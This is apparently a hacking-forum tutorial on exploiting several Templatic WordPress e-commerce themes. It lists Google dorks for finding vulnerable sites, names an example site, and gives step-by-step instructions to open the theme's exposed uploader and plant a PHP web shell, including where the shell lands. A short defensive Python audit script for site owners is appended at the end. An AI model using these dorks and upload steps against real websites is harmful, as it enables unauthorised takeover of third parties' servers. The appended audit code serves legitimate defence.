WordPress Themes Vulnerable
WordPress Themes Vulnerable to this Exploit:
WPStore
eShop
KidzStore
Emporium
Store
eCommerce
framework
Tutorial
1. Go to Google and search this dork:
"StoreBox by Templatic" intext:rings
"StoreBox by Templatic" intext:dress
"StoreBox by Templatic" intext:shoes
"StoreBox by Templatic" intext:jacket
"StoreBox by Templatic" intext:jeans
"StoreBox by Templatic" intext:clothes
"StoreBox by Templatic" intext:purse
2. Click on any website.
Example:
http://shopshack.net
Right-click and click View Page Source.
3. Locate the theme within the source code.
Which is:
http://shopshack.net/wp-content/themes/framework/
Notice that the theme is /framework/
We have now found a vulnerable theme to test the exploit.
4. Next, add /upload/ to the end of the URL after /framework/
5. Use the Uploader to upload your shell. (Supports: .php .txt .html)
Shell Access:
/wp-content/uploads/products_img/SHELL-NAME-HERE.php
Example:
http://shopshack.net/wp-content/uploads/...mg/dir.php
Another Google Dork:
inurl:/wp-content/themes/wpstore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/framework/chkorder.php?color=
inurl:/wp-content/themes/wpstore/thumb.php?src=
inurl:/wp-content/themes/framework/thumb.php?src=
inurl:/wp-content/themes/eCommerce/thumb.php?src=
inurl:/wp-content/themes/framework/getsubcat.php?q=
Credits: HackForums
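For site owners, a local audit of the condition this post describes, added here as an example and not part of the original post: it checks a WordPress document root on disk for the theme directories listed above, reports whether each has an upload/ subdirectory, and lists script files under wp-content/uploads (which includes products_img). The function names, the extension set and the sample tree are assumptions made for the illustration.

```python
import os
import tempfile

# Theme directory names listed on this page, compared case-insensitively.
LISTED_THEMES = {"wpstore", "eshop", "kidzstore", "emporium", "store",
                 "ecommerce", "framework"}
# Assumption: extensions the web server would execute; adjust to your handlers.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar"}


def find_listed_themes(docroot):
    """Return (theme_name, has_upload_dir) for each listed theme installed."""
    themes_dir = os.path.join(docroot, "wp-content", "themes")
    if not os.path.isdir(themes_dir):
        return []
    hits = []
    for name in sorted(os.listdir(themes_dir)):
        path = os.path.join(themes_dir, name)
        if name.lower() in LISTED_THEMES and os.path.isdir(path):
            hits.append((name, os.path.isdir(os.path.join(path, "upload"))))
    return hits


def find_scripts_in_uploads(docroot):
    """Return docroot-relative paths of script files under wp-content/uploads."""
    uploads = os.path.join(docroot, "wp-content", "uploads")
    found = []
    for base, _dirs, files in os.walk(uploads):
        for fname in files:
            if os.path.splitext(fname)[1].lower() in SCRIPT_EXTS:
                found.append(os.path.relpath(os.path.join(base, fname), docroot))
    return sorted(found)


def build_sample_site(root):
    """Create a constructed sample tree (not real data) for the demo."""
    wp = os.path.join(root, "wp-content")
    os.makedirs(os.path.join(wp, "themes", "framework", "upload"))
    os.makedirs(os.path.join(wp, "themes", "twentytwelve"))
    os.makedirs(os.path.join(wp, "uploads", "products_img"))
    for fname in ("ring.jpg", "dir.php"):
        open(os.path.join(wp, "uploads", "products_img", fname), "w").close()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        print("listed themes:", find_listed_themes(site))
        print("scripts in uploads:", find_scripts_in_uploads(site))
```

Any script file reported under uploads warrants investigation, and disabling script execution for that directory in the web server configuration removes the impact of a stray upload.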